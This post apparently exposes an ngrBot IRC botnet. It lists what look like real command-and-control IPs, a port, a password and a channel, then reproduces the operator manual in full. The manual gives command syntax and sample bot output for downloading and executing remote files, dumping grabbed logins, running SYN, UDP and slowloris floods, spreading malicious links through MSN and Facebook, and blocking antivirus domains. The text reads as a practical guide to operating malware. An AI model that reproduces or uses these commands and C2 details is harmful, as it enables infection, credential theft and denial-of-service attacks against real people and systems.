Older version of ngrBot with the original manual included
Remote Host Port Number
199.15.234.7 80
64.186.134.161 7834 PASS puto
NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #dr3 ngrBot
Now talking in #dr3
Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]
Topic By: [ root3d ]
(root3d) /lusers
topic says everything u have to know about ngrBot lol
here i m including the manual just in case he delete it
Commands:
#p - pdef(also known as the botkiller/protection)
#r - ruskill(shows what bots you ruskilled (when selling installs you use to keep your bots)
#f - ftps
#l - formgrabber logins
#s - usb, msn, facebook
Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.
!dl [url] <md5> <-r> <-n>
The bot downloads and executes a file from the specified URL.
Parameters
url URL of the file to download and execute
md5 optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
-r Enable RusKill on downloaded file
-n Disables PDef+ on the system until reboot or until it is manually re-enabled
Example
[00:00:00] <You> !dl http://example.com/test.exe
[00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/test.exe" s="94208 bytes"] Executed file "C:UsersAdministratorAppDataRoamingABCD.tmp"
[00:00:10] <You> !dl http://example.com/bot.exe -r
[00:00:15] <{RU|W7a}abcdefg> [d="http://example.com/bot.exe" s="188416 bytes"] Executed file "C:UsersAdministratorAppDataRoaming1234.tmp"
[00:00:15] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:Documents and SettingsAdministratorApplication Data1234.tmp"
[00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:DOCUME~1ADMINI~1LOCALS~1Templsass.exe"
[00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected Reg: "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun"
[00:00:17] <{RU|W7a}abcdefg> [Ruskill]: Detected DNS: "cnc.example.com"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!up [url] [md5] <-r>
The bot updates its file, but the update does not take effect until the system is restarted.
Parameters
url URL of the file to update to
md5 MD5 hash of the update file
-r Reboot immediately
Example
[00:00:00] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
[00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="87040 bytes"] Update error: MD5 mismatch (857526760C0E67BB502B7183DEE52767 != 58050954C432B8786284C4E0C7011A57)
[00:00:15] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
[00:00:20] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="94208 bytes"] Updated bot file "C:UsersAdministratorAppDataRoamingZyxwvu.exe"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!die
The bot disconnects from the IRC server and does not reconnect until its system reboots.
Example
[00:00:00] <You> !die
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!rm
The bot will remove itself from the system.
Example
[00:00:00] <You> !rm
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!m [state]
Enable/disable all output to IRC regarding to commands and features.
Parameters
state Enable (on) or disable (off) muting of all output to IRC
Example
[00:00:00] <You> !m on
[00:00:05] <You> !v
[00:00:10] <You> !m off
[00:00:15] <You> !v
[00:00:16] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:UsersAdministratorAppDataRoamingZyxwvu.exe"]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!v
The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.
Example
[00:00:00] <You> !v
[00:00:01] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:UsersAdministratorAppDataRoamingZyxwvu.exe"]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!vs [url] [state]
The bot creates a browser instance and visits the specified link.
Parameters
url URL to open
state Open in a visible (1) or invisible (0) window
Example
[00:00:00] <You> !vs http://example.com/ 0
[00:00:01] <{RU|W7a}abcdefg> [Visit]: Visited "http://example.com/"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!rc <-n|-g>
The bot disconnects from the IRC server and waits 15 seconds before reconnecting.
Parameters
-n Only reconnect if the bot is currently marked as "new"
-g Only reconnect if the bot did not previously succeed in determining its country using GeoIP
Example
[00:00:00] <You> !rc
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
[00:00:16] * <{RU|W7a}gfedcba> (gfedcba@127.0.0.1) has joined #boss
[00:00:25] <You> !rc -g
[00:00:26] * <{ESP|W7a}abcdefg> (abcdefg@127.0.0.2) Quit (Connection reset by server)
[00:00:41] * <{MX|W7a}gfedcba> (gfedcba@127.0.0.2) has joined #boss
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!j [<[rule] [options]> channel] <key>
The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.
Parameters
rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options Options for selected rule
With -c, you can put a single or multiple comma-separated country code(s)
With -v, you can put a single or multiple comma-separated version(s)
channel Channel to join
key Key of channel to join
Example
[00:00:00] <You> !j #test k3y
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test
[00:00:05] <You> !j -c RU #test2 k3y
[00:00:10] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test2
[00:00:11] <You> !j -c US,GB,AU,CA,RU #test3 k3y
[00:00:15] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test3
[00:00:15] <You> !j -v 1.0.3 #test4 k3y
[00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!p [<[rule] [options]> channel]
The bot parts the specified channel.
Parameters
rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options Options for selected rule
With -c, you can put a single or multiple comma-separated country code(s)
With -v, you can put a single or multiple comma-separated version(s)
channel Channel to part
Example
[00:00:00] <You> !p #test
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test
[00:00:05] <You> !p -c RU #test2
[00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test2
[00:00:10] <You> !p -c US,GB,AU,CA,RU #test3
[00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test3
[00:00:15] <You> !p -v 1.0.3 #test4
[00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test4
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!s <rule>
The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).
Parameters
rule Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
Example
[00:00:00] <You> !s
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #RU
[00:00:05] <You> !s -o
[00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #W7
[00:00:10] <You> !s -u
[00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #admin
[00:00:15] <You> !s -v
[00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #1.0.3
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!us <rule>
The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).
Parameters
rule Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
Example
[00:00:00] <You> !us
[00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #RU
[00:00:05] <You> !us -o
[00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #W7
[00:00:10] <You> !us -u
[00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #admin
[00:00:10] <You> !us -v
[00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #1.0.3
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!mod [module] [state]
Enable/disable modules that use hooks.
Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.
Parameters
module Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
state Enable (on) or disable (off) module
Example
[00:00:00] <You> !mod ftpgrab off
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!stats <-l|-s>
Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.
Parameters
-l Display login grabber stats
-s Display spreading stats
Example
[00:00:00] <You> !stats
[00:00:01] <{RU|W7a}abcdefg> [usb="3" msn="10" http="2" total="15"]
[00:00:02] <{RU|W7a}abcdefg>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!logins <site|-c>
Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.
Parameters
site Site to retrieve logins for (case insensitive, see here for the list of sites)
-c Clear login cache
Example
[00:00:00] <You> !logins
[00:00:01] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123
[00:00:02] <{RU|W7a}abcdefg> [Logins]: YouTube ->> noob@mail.ru : password321
[00:00:05] <You> !logins facebook
[00:00:06] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!stop
The bot will end all running flood tasks.
Example
[00:00:00] <You> !udp example.com 80 60
[00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
[00:00:30] <You> !stop
[00:00:31] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!ssyn [host] [port] [seconds]
See here.
Parameters
host Host to flood with SYN requests
port Port to flood. If 0, the bot uses a random port
seconds Number of seconds to flood the target
Example
[00:00:00] <You> !ssyn example.com 80 60
[00:00:01] <{RU|W7a}abcdefg> [SYN]: Starting flood on "example.com:80" for 60 second(s)
[00:01:01] <{RU|W7a}abcdefg> [SYN]: Finished flood on "example.com:80"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!udp [host] [port] [seconds]
See here.
Parameters
host Host to flood with UDP packets
port Port to flood. If 0, the bot uses a random port
seconds Number of seconds to flood the target
Example
[00:00:00] <You> !udp example.com 80 60
[00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
[00:01:01] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!slow [host] [minutes]
See here.
Parameters
host Host to flood using slowloris
minutes Number of minutes to flood the target
Example
[00:00:00] <You> !slow example.com 3
[00:00:01] <{RU|W7a}abcdefg> [Slowloris]: Starting flood on "example.com" for 3 minutes
[00:03:01] <{RU|W7a}abcdefg> [Slowloris]: Finished flood on "example.com"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!msn.int [interval]
Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
interval Number of MSN messages before spread
Example
[00:00:00] <You> !msn.int 3
[00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread interval to "3"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!msn.set [message]
Set the message that will be used for MSN spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
message Message to spread via MSN
Example
[00:00:00] <You> !msn.set LOL http://example.com/img###/*****/DSC0001.jpg
[00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!http.int [interval]
Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
interval Number of Facebook messages before spread
Example
[00:00:00] <You> !http.int 3
[00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated HTTP spread interval to "3"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!http.set [message]
Set the message that will be used for Facebook spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
message Message to spread via Facebook
Example
[00:00:00] <You> !http.set LOL http://example.com/img###/*****/DSC0001.jpg
[00:00:01] <{RU|W7a}abcdefg> [HTTP]: Updated HTTP spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
!mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]
The bot will block access to or redirect the specified domain/IP address.
Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.
Parameters
url Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
domain1 Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
ip1 Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
domain2 DNS queries for domain1 will be redirected to this domain if set
ip2 DNS queries for ip1 or domain1 will be redirected to this IP address if set
Example
[00:00:00] <You> !mdns mail.example.com
[00:00:01] <{RU|W7a}abcdefg> [DNS]: Blocked "mail.example.com"
[00:00:05] <You> !mdns http://www.example.com http://www.mysite.com
[00:00:06] <{RU|W7a}abcdefg> [DNS]: Redirected "www.example.com" to "www.mysite.com"
[00:00:10] <You> !mdns 127.0.0.1 127.0.0.2
[00:00:11] <{RU|W7a}abcdefg> [DNS]: Redirected "127.0.0.1" to "127.0.0.2"
hosting infos:
http://whois.domaintools.com/64.186.134.161